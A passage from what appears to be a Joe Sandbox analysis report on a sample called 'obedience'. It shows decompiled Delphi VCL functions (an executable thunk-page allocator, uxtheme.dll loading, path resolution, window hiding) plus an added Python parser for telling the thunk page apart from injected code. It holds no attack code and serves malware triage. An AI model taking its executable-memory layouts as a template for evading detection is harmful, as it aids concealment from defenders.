      					_t52 =  *0x490884; // 0x2420000
      					 *_v12 = _t52;
      					E00402CEC(0x48e498, 2, _v12 + 4);
      					 *((intOrPtr*)(_v12 + 6)) = E00423750(_v12 + 5, E00423730);
      					 *_t48 = _v12 + 0xa;
      					do {
      						 *((char*)( *_t48)) = 0xe8;
      						 *((intOrPtr*)( *_t48 + 1)) = E00423750( *_t48, _v12 + 4);
      						 *((intOrPtr*)( *_t48 + 5)) =  *0x490888;
      						 *0x490888 =  *_t48;
      						 *_t48 =  *_t48 + 0xd;
      					} while ( *_t48 - _v12 < 0xffc);
      					 *0x490884 = _v12;
      				}
      				_v8 =  *0x490888;
      				 *_t48 =  *0x490888;
      				 *0x490888 =  *((intOrPtr*)( *_t48 + 5));
      				_t27 =  *_t48;
      				 *((intOrPtr*)(_t27 + 5)) = _a4;
      				 *((intOrPtr*)(_t27 + 9)) = _a8;
      				return _v8;
      			}

      Instruction addresses shown beside the decompiled statements: 0x00423760 0x0042376b 0x0042377f 0x00423784 0x0042378a 0x00423790 0x004237a2 0x004237ba 0x004237c3 0x004237c5 0x004237c7 0x004237d9 0x004237e0 0x004237e5 0x004237e7 0x004237ef 0x004237f9 0x004237f9 0x00423800 0x00423805 0x0042380c 0x0042380e 0x00423813 0x00423819 0x00423824

      APIs
      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042377F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: af29eab902ea9e914c2744c0836ff95d2d8015173147c58378f4f0ba428cb87b
      • Instruction ID: 3ad7cb04429b5cead1619c228b908b65ac72ac921874839367886b3112e9338c
      • Opcode Fuzzy Hash: af29eab902ea9e914c2744c0836ff95d2d8015173147c58378f4f0ba428cb87b
      • Instruction Fuzzy Hash: 2031F3B8A00219DFCB10DF99C480F89BBF1FF49314F1081AAE958DB365D334AA41CB85
      Uniqueness

      Uniqueness Score: -1.00%
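
The block-filling loop in E00423758 above has the layout of Delphi's Classes.MakeObjectInstance (this identification is the editor's; the report does not name it). VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) gets one page; its first 10 bytes hold the previous block pointer (*0x490884), two code bytes copied from 0x48e498 and a rel32 to E00423730 (StdWndProc), and from offset 0xa the page is cut into 13-byte thunks: an E8 call whose rel32 points back at block+4, followed by the 8-byte method record (code pointer at +5, data pointer at +9). The call pushes thunk+5 as its return address, so the two bytes at block+4 (pop ecx; jmp StdWndProc in Delphi's source) hand StdWndProc a pointer to the method record; *0x490888 is the head of the free-thunk list. A sandbox flags the RWX page; a triager who can verify this layout can tell the VCL's own window-procedure thunk page from injected code. The Python below is an added example, not part of the report or the sample: it builds a page with this layout (the block address 0x2420000 and StdWndProc 0x423730 come from the report's annotations, the 59 E9 header bytes from Delphi's source, and the bound-method values are hypothetical) and parses it back, failing closed on anything that does not match.

```python
import struct

PAGE_SIZE = 0x1000       # VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) in E00423758
HEADER_SIZE = 10         # next-block ptr (4) + 2 code bytes + rel32 to StdWndProc (4); thunks start at +0xa
THUNK_SIZE = 13          # E8 rel32 (5) + method code ptr (4) + method data ptr (4); the loop steps by 0xd
THUNK_AREA_END = 0xFFC   # the fill loop runs while (thunk - block) < 0xffc
# The two header bytes are copied from 0x48e498, which the report does not dump. Delphi's
# Classes.pas defines them as 59 E9 (pop ecx ; jmp rel32); that value is assumed here.
BLOCK_CODE = bytes([0x59, 0xE9])


def calc_jmp_offset(src, dest):
    """rel32 for a 5-byte call/jmp located at src that lands on dest (what E00423750 computes)."""
    return (dest - (src + 5)) & 0xFFFFFFFF


def build_instance_block(block_addr, std_wndproc, prev_block=0, bound=None):
    """Construct a page with the layout E00423758 produces. Sample data, not a dump from the
    report; `bound` maps thunk index -> (method code, method data) for thunks handed out."""
    bound = bound or {}
    page = bytearray(PAGE_SIZE)
    struct.pack_into('<I', page, 0, prev_block)
    page[4:6] = BLOCK_CODE
    struct.pack_into('<I', page, 6, calc_jmp_offset(block_addr + 5, std_wndproc))
    free_head = 0
    off = HEADER_SIZE
    while off < THUNK_AREA_END:
        page[off] = 0xE8
        struct.pack_into('<I', page, off + 1, calc_jmp_offset(block_addr + off, block_addr + 4))
        idx = (off - HEADER_SIZE) // THUNK_SIZE
        if idx in bound:
            struct.pack_into('<II', page, off + 5, *bound[idx])
        else:
            struct.pack_into('<I', page, off + 5, free_head)  # free thunk: next-free pointer
            free_head = block_addr + off
        off += THUNK_SIZE
    return bytes(page)


def parse_instance_block(page, block_addr):
    """Return None unless `page` (4 KiB read from block_addr) matches the thunk-block layout;
    otherwise the StdWndProc address and every thunk as (thunk addr, code ptr, data ptr)."""
    if len(page) < PAGE_SIZE or page[4:6] != BLOCK_CODE:
        return None
    rel = struct.unpack_from('<I', page, 6)[0]
    std_wndproc = (block_addr + 10 + rel) & 0xFFFFFFFF   # the jmp at +5 is 5 bytes long
    thunks = []
    off = HEADER_SIZE
    while off < THUNK_AREA_END:
        if page[off] != 0xE8:
            return None
        rel = struct.unpack_from('<I', page, off + 1)[0]
        # Every thunk's call must land on the shared "pop ecx; jmp" at block+4; the pushed
        # return address (thunk+5) is the method record that StdWndProc pops into ecx.
        if ((block_addr + off + 5 + rel) & 0xFFFFFFFF) != block_addr + 4:
            return None
        code, data = struct.unpack_from('<II', page, off + 5)
        thunks.append((block_addr + off, code, data))
        off += THUNK_SIZE
    next_block = struct.unpack_from('<I', page, 0)[0]
    return {'next_block': next_block, 'std_wndproc': std_wndproc, 'thunks': thunks}


def bound_thunks(parsed, image_lo, image_hi):
    """Thunks whose method code pointer lies inside the main image: live window procedures.
    Free thunks carry a next-free pointer into a thunk page (or 0) in that slot instead."""
    return [t for t in parsed['thunks'] if image_lo <= t[1] < image_hi]
```

On a real dump, read 4 KiB at the address VirtualAlloc returned (the report records the live block at *0x490884 as 0x2420000) and pass it with that address. A page that parses, with every thunk's call landing on block+4 and the jmp landing in the image's code, is the VCL thunk page; a page that fails the check deserves the "executable memory" alarm.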

      C-Code - Quality: 90%
      			E00430384(void* __ebx, void* __ecx) {
      				char _v5;
      				intOrPtr _t2;
      				intOrPtr _t6;
      				intOrPtr _t108;
      				intOrPtr _t111;
      
      				_t2 =  *0x490a4c; // 0x248194c
      				E0043017C(_t2);
      				_push(_t111);
      				_push(0x430737);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t111;
      				 *0x490a48 =  *0x490a48 + 1;
      				if( *0x490a44 == 0) {
      					 *0x490a44 = LoadLibraryA("uxtheme.dll");
      					if( *0x490a44 > 0) {
      						 *0x490984 = GetProcAddress( *0x490a44, "OpenThemeData");
      						 *0x490988 = GetProcAddress( *0x490a44, "CloseThemeData");
      						 *0x49098c = GetProcAddress( *0x490a44, "DrawThemeBackground");
      						 *0x490990 = GetProcAddress( *0x490a44, "DrawThemeText");
      						 *0x490994 = GetProcAddress( *0x490a44, "GetThemeBackgroundContentRect");
      						 *0x490998 = GetProcAddress( *0x490a44, "GetThemeBackgroundContentRect");
      						 *0x49099c = GetProcAddress( *0x490a44, "GetThemePartSize");
      						 *0x4909a0 = GetProcAddress( *0x490a44, "GetThemeTextExtent");
      						 *0x4909a4 = GetProcAddress( *0x490a44, "GetThemeTextMetrics");
      						 *0x4909a8 = GetProcAddress( *0x490a44, "GetThemeBackgroundRegion");
      						 *0x4909ac = GetProcAddress( *0x490a44, "HitTestThemeBackground");
      						 *0x4909b0 = GetProcAddress( *0x490a44, "DrawThemeEdge");
      						 *0x4909b4 = GetProcAddress( *0x490a44, "DrawThemeIcon");
      						 *0x4909b8 = GetProcAddress( *0x490a44, "IsThemePartDefined");
      						 *0x4909bc = GetProcAddress( *0x490a44, "IsThemeBackgroundPartiallyTransparent");
      						 *0x4909c0 = GetProcAddress( *0x490a44, "GetThemeColor");
      						 *0x4909c4 = GetProcAddress( *0x490a44, "GetThemeMetric");
      						 *0x4909c8 = GetProcAddress( *0x490a44, "GetThemeString");
      						 *0x4909cc = GetProcAddress( *0x490a44, "GetThemeBool");
      						 *0x4909d0 = GetProcAddress( *0x490a44, "GetThemeInt");
      						 *0x4909d4 = GetProcAddress( *0x490a44, "GetThemeEnumValue");
      						 *0x4909d8 = GetProcAddress( *0x490a44, "GetThemePosition");
      						 *0x4909dc = GetProcAddress( *0x490a44, "GetThemeFont");
      						 *0x4909e0 = GetProcAddress( *0x490a44, "GetThemeRect");
      						 *0x4909e4 = GetProcAddress( *0x490a44, "GetThemeMargins");
      						 *0x4909e8 = GetProcAddress( *0x490a44, "GetThemeIntList");
      						 *0x4909ec = GetProcAddress( *0x490a44, "GetThemePropertyOrigin");
      						 *0x4909f0 = GetProcAddress( *0x490a44, "SetWindowTheme");
      						 *0x4909f4 = GetProcAddress( *0x490a44, "GetThemeFilename");
      						 *0x4909f8 = GetProcAddress( *0x490a44, "GetThemeSysColor");
      						 *0x4909fc = GetProcAddress( *0x490a44, "GetThemeSysColorBrush");
      						 *0x490a00 = GetProcAddress( *0x490a44, "GetThemeSysBool");
      						 *0x490a04 = GetProcAddress( *0x490a44, "GetThemeSysSize");
      						 *0x490a08 = GetProcAddress( *0x490a44, "GetThemeSysFont");
      						 *0x490a0c = GetProcAddress( *0x490a44, "GetThemeSysString");
      						 *0x490a10 = GetProcAddress( *0x490a44, "GetThemeSysInt");
      						 *0x490a14 = GetProcAddress( *0x490a44, "IsThemeActive");
      						 *0x490a18 = GetProcAddress( *0x490a44, "IsAppThemed");
      						 *0x490a1c = GetProcAddress( *0x490a44, "GetWindowTheme");
      						 *0x490a20 = GetProcAddress( *0x490a44, "EnableThemeDialogTexture");
      						 *0x490a24 = GetProcAddress( *0x490a44, "IsThemeDialogTextureEnabled");
      						 *0x490a28 = GetProcAddress( *0x490a44, "GetThemeAppProperties");
      						 *0x490a2c = GetProcAddress( *0x490a44, "SetThemeAppProperties");
      						 *0x490a30 = GetProcAddress( *0x490a44, "GetCurrentThemeName");
      						 *0x490a34 = GetProcAddress( *0x490a44, "GetThemeDocumentationProperty");
      						 *0x490a38 = GetProcAddress( *0x490a44, "DrawThemeParentBackground");
      						 *0x490a3c = GetProcAddress( *0x490a44, "EnableTheming");
      					}
      				}
      				_v5 =  *0x490a44 > 0;
      				_pop(_t108);
      				 *[fs:eax] = _t108;
      				_push(0x43073e);
      				_t6 =  *0x490a4c; // 0x248194c
      				return E00430184(_t6);
      			}

      APIs
      • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00430737), ref: 004303BA
      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 004303D2
      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 004303E4
      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 004303F6
      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00430408
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0043041A
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0043042C
      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0043043E
      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00430450
      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00430462
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00430474
      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00430486
      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00430498
      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 004304AA
      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 004304BC
      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 004304CE
      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 004304E0
      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 004304F2
      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00430504
      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00430516
      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00430528
      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0043053A
      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0043054C
      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0043055E
      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00430570
      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00430582
      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00430594
      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 004305A6
      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004305B8
      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 004305CA
      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 004305DC
      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 004305EE
      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00430600
      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00430612
      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00430624
      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00430636
      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00430648
      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0043065A
      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0043066C
      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0043067E
      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00430690
      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 004306A2
      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 004306B4
      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 004306C6
      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 004306D8
      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 004306EA
      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004306FC
      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0043070E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$LibraryLoad
      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
      • API String ID: 2238633743-2910565190
      • Opcode ID: 6cc17476dc2698392d0e410eccae24de7198a0cf54c4321817fdb7559798ceca
      • Instruction ID: 9d4286b95b2f7980caa544ea75cac6461944ff1cda2460a3c219c40039510ae6
      • Opcode Fuzzy Hash: 6cc17476dc2698392d0e410eccae24de7198a0cf54c4321817fdb7559798ceca
      • Instruction Fuzzy Hash: E4A100B0E457149FDB00EB659CA6F2677A8EB29700F105777B404DF292D6BDAC008B9E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 53%
      			E00405F34(char* __eax, intOrPtr __edx) {
      				char* _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				char* _v20;
      				intOrPtr _v24;
      				_Unknown_base(*)()* _v28;
      				struct _WIN32_FIND_DATAA _v346;
      				char _v607;
      				char* _t75;
      				char* _t85;
      				void* _t108;
      				void* _t112;
      				struct HINSTANCE__* _t114;
      				void* _t115;
      				void* _t116;
      
      				_v12 = __edx;
      				_v8 = __eax;
      				_v16 = _v8;
      				_t114 = GetModuleHandleA("kernel32.dll");
      				if(_t114 == 0) {
      					L4:
      					if( *_v8 != 0x5c) {
      						_v20 = _v8 + 2;
      						goto L10;
      					} else {
      						if( *((char*)(_v8 + 1)) == 0x5c) {
      							_v20 = E00405F08(_v8 + 2);
      							if( *_v20 != 0) {
      								_v20 = E00405F08(_v20 + 1);
      								if( *_v20 != 0) {
      									L10:
      									_t108 = _v20 - _v8;
      									_push(_t108 + 1);
      									_push(_v8);
      									_push( &_v607);
      									L00401338();
      									while( *_v20 != 0) {
      										_v24 = E00405F08(_v20 + 1);
      										_t112 = _v24 - _v20;
      										if(_t112 + _t108 + 1 <= 0x105) {
      											_push(_t112 + 1);
      											_push(_v20);
      											_push( &(( &_v607)[_t108]));
      											L00401338();
      											_t115 = FindFirstFileA( &_v607,  &_v346);
      											if(_t115 != 0xffffffff) {
      												FindClose(_t115);
      												_t75 =  &(_v346.cFileName);
      												_push(_t75);
      												L00401340();
      												if(_t75 + _t108 + 1 + 1 <= 0x105) {
      													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
      													_push(0x105 - _t108 - 1);
      													_push( &(_v346.cFileName));
      													_push( &(( &(( &_v607)[_t108]))[1]));
      													L00401338();
      													_t85 =  &(_v346.cFileName);
      													_push(_t85);
      													L00401340();
      													_t108 = _t108 + _t85 + 1;
      													_v20 = _v24;
      													continue;
      												}
      											}
      										}
      										goto L17;
      									}
      									_push(_v12);
      									_push( &_v607);
      									_push(_v8);
      									L00401338();
      								}
      							}
      						}
      					}
      				} else {
      					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
      					if(_v28 == 0) {
      						goto L4;
      					} else {
      						_push(0x105);
      						_push( &_v607);
      						_push(_v8);
      						if(_v28() == 0) {
      							goto L4;
      						} else {
      							_push(_v12);
      							_push( &_v607);
      							_push(_v8);
      							L00401338();
      						}
      					}
      				}
      				L17:
      				return _v16;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,0048E0A8), ref: 00405F51
      • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405F62
      • lstrcpyn.KERNEL32(?,?,?,?,?,0048E0A8), ref: 00405F96
      • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406007
      • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406042
      • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406055
      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 00406062
      • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,?,?,0048E0A8), ref: 0040606E
      • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 004060A2
      • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 004060AE
      • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 004060D7
      Similarity
      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
      • String ID: GetLongPathNameA$\$kernel32.dll
      • API String ID: 3245196872-1565342463
      • Opcode ID: cff0fbaffe13a2c73daf49a6396f4cf4de9f544e97ebb51611a1cb52ce2d600a
      • Instruction ID: ff1af111cfb2876d1c5f465b6992c7cfacd73e47febd5bc0b03d64561f0af370
      • Opcode Fuzzy Hash: cff0fbaffe13a2c73daf49a6396f4cf4de9f544e97ebb51611a1cb52ce2d600a
      • Instruction Fuzzy Hash: 3B512671900629EFDB11DBA9CC89AEFB7B8AF08304F1405A6B505F7281D7389E408B68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 84%
      			E00460740(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				char _v12;
      				intOrPtr _t149;
      				intOrPtr _t154;
      				intOrPtr _t155;
      				intOrPtr _t160;
      				intOrPtr _t162;
      				intOrPtr _t163;
      				void* _t165;
      				struct HWND__* _t166;
      				long _t176;
      				signed int _t198;
      				signed int _t199;
      				long _t220;
      				intOrPtr _t226;
      				int _t231;
      				intOrPtr _t232;
      				intOrPtr _t241;
      				intOrPtr _t245;
      				signed int _t248;
      				intOrPtr _t251;
      				intOrPtr _t252;
      				signed int _t258;
      				long _t259;
      				intOrPtr _t262;
      				intOrPtr _t266;
      				signed int _t269;
      				intOrPtr _t270;
      				intOrPtr _t271;
      				signed int _t277;
      				long _t278;
      				intOrPtr _t281;
      				signed int _t286;
      				signed int _t287;
      				long _t290;
      				intOrPtr _t294;
      				struct HWND__* _t299;
      				signed int _t301;
      				signed int _t302;
      				signed int _t305;
      				signed int _t307;
      				long _t308;
      				signed int _t311;
      				signed int _t313;
      				long _t314;
      				signed int _t317;
      				signed int _t318;
      				signed int _t326;
      				long _t328;
      				intOrPtr _t331;
      				intOrPtr _t362;
      				long _t370;
      				void* _t372;
      				void* _t373;
      				intOrPtr _t374;
      
      				_t372 = _t373;
      				_t374 = _t373 + 0xfffffff8;
      				_v12 = 0;
      				_v8 = __eax;
      				_push(_t372);
      				_push(0x460caa);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t374;
      				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
      					_t294 =  *0x48f9cc; // 0x423b08
      					E00406A3C(_t294, 0,  &_v12);
      					E0040CBEC(_v12, 1);
      					E004043D0();
      				}
      				_t149 =  *0x490b7c; // 0x2481268
      				E004650E0(_t149);
      				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
      				_push(_t372);
      				_push(0x460c8d);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t374;
      				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
      					_t155 = _v8;
      					_t378 =  *((char*)(_t155 + 0x1a6));
      					if( *((char*)(_t155 + 0x1a6)) == 0) {
      						_push(_t372);
      						_push(0x460b94);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t374;
      						E00403DF8(_v8, __eflags);
      						 *[fs:eax] = 0;
      						_t160 =  *0x490b80; // 0x2480e74
      						_t127 = _t160 + 0x6c; // 0x0
      						__eflags =  *_t127 - _v8;
      						if( *_t127 == _v8) {
      							__eflags = 0;
      							E0045F8EC(_v8, 0);
      						}
      						_t162 = _v8;
      						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
      						if( *((char*)(_t162 + 0x22f)) != 1) {
      							_t163 = _v8;
      							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
      							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
      								_t299 = 0;
      								_t165 = E0044B158(_v8);
      								_t166 = GetActiveWindow();
      								__eflags = _t165 - _t166;
      								if(_t165 == _t166) {
      									_t176 = IsIconic(E0044B158(_v8));
      									__eflags = _t176;
      									if(_t176 == 0) {
      										_t299 = E0045B4F4(E0044B158(_v8));
      									}
      								}
      								__eflags = _t299;
      								if(_t299 == 0) {
      									ShowWindow(E0044B158(_v8), 0);
      								} else {
      									SetWindowPos(E0044B158(_v8), 0, 0, 0, 0, 0, 0x97);
      									SetActiveWindow(_t299);
      								}
      							} else {
      								SetWindowPos(E0044B158(_v8), 0, 0, 0, 0, 0, 0x97);
      							}
      						} else {
      							E00448688(_v8);
      						}
      					} else {
      						_push(_t372);
      						_push(0x4607f8);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t374;
      						E00403DF8(_v8, _t378);
      						 *[fs:eax] = 0;
      						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
      							if( *((char*)(_v8 + 0x22f)) != 1) {
      								_t301 = E00461FD4() -  *(_v8 + 0x48);
      								__eflags = _t301;
      								_t302 = _t301 >> 1;
      								if(_t301 < 0) {
      									asm("adc ebx, 0x0");
      								}
      								_t198 = E00461FC8() -  *(_v8 + 0x4c);
      								__eflags = _t198;
      								_t199 = _t198 >> 1;
      								if(_t198 < 0) {
      									asm("adc eax, 0x0");
      								}
      							} else {
      								_t241 =  *0x490b7c; // 0x2481268
      								_t31 = _t241 + 0x44; // 0x0
      								_t305 = E0044432C( *_t31) -  *(_v8 + 0x48);
      								_t302 = _t305 >> 1;
      								if(_t305 < 0) {
      									asm("adc ebx, 0x0");
      								}
      								_t245 =  *0x490b7c; // 0x2481268
      								_t34 = _t245 + 0x44; // 0x0
      								_t248 = E00444370( *_t34) -  *(_v8 + 0x4c);
      								_t199 = _t248 >> 1;
      								if(_t248 < 0) {
      									asm("adc eax, 0x0");
      								}
      							}
      							if(_t302 < 0) {
      								_t302 = 0;
      							}
      							if(_t199 < 0) {
      								_t199 = 0;
      							}
      							_t326 = _t199;
      							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
      							if( *((char*)(_v8 + 0x57)) != 0) {
      								E0045EB94(_v8, _t326);
      							}
      						} else {
      							_t251 =  *((intOrPtr*)(_v8 + 0x230));
      							__eflags = _t251 + 0xfa - 2;
      							if(_t251 + 0xfa - 2 >= 0) {
      								__eflags = _t251 - 5;
      								if(_t251 == 5) {
      									_t252 = _v8;
      									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
      									if( *((char*)(_t252 + 0x22f)) != 1) {
      										_t307 = E00462004() -  *(_v8 + 0x48);
      										__eflags = _t307;
      										_t308 = _t307 >> 1;
      										if(_t307 < 0) {
      											asm("adc ebx, 0x0");
      										}
      										_t258 = E00461FF8() -  *(_v8 + 0x4c);
      										__eflags = _t258;
      										_t259 = _t258 >> 1;
      										if(_t258 < 0) {
      											asm("adc eax, 0x0");
      										}
      									} else {
      										_t262 =  *0x490b7c; // 0x2481268
      										_t82 = _t262 + 0x44; // 0x0
      										_t311 = E0044432C( *_t82) -  *(_v8 + 0x48);
      										__eflags = _t311;
      										_t308 = _t311 >> 1;
      										if(_t311 < 0) {
      											asm("adc ebx, 0x0");
      										}
      										_t266 =  *0x490b7c; // 0x2481268
      										_t85 = _t266 + 0x44; // 0x0
      										_t269 = E00444370( *_t85) -  *(_v8 + 0x4c);
      										__eflags = _t269;
      										_t259 = _t269 >> 1;
      										if(_t269 < 0) {
      											asm("adc eax, 0x0");
      										}
      									}
      									__eflags = _t308;
      									if(_t308 < 0) {
      										_t308 = 0;
      										__eflags = 0;
      									}
      									__eflags = _t259;
      									if(_t259 < 0) {
      										_t259 = 0;
      										__eflags = 0;
      									}
      									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
      								}
      							} else {
      								_t270 =  *0x490b7c; // 0x2481268
      								_t52 = _t270 + 0x44; // 0x0
      								_t370 =  *_t52;
      								_t271 = _v8;
      								__eflags =  *((char*)(_t271 + 0x230)) - 7;
      								if( *((char*)(_t271 + 0x230)) == 7) {
